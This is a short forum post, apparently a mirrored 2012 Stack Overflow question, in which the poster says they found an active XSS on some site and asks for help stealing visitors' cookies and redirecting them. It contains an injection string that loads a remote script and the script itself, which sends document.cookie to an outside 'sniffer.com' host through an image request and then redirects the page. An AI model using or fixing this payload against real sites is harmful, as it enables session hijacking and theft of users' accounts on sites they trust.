Xss redirect and cookies
Posted
by
user1824906
on Stack Overflow
See other posts from Stack Overflow
or by user1824906
Published on 2012-11-21T22:56:28Z
Indexed on
2012/11/21
22:59 UTC
Read the original article
Hit count: 287
I found Active XSS on one site. I need to steal cookies and after it to make redirect on other site. This site has a non-frame protection
I tried to put "><script src='http://site.ru/1.js' /></script>"
http://site.ru/1.js contains:
img = new Image(); img.src = "http:/sniffer.com/nasdasdnu.gif?"+document.cookie;
var URL = "http://images.cards.mail.ru/11bolprivet.jpg"
var speed = 100;
function reload() {
document.location = URL
}
setTimeout("reload()", speed);
But it doesn't work=\ Any help?
© Stack Overflow or respective owner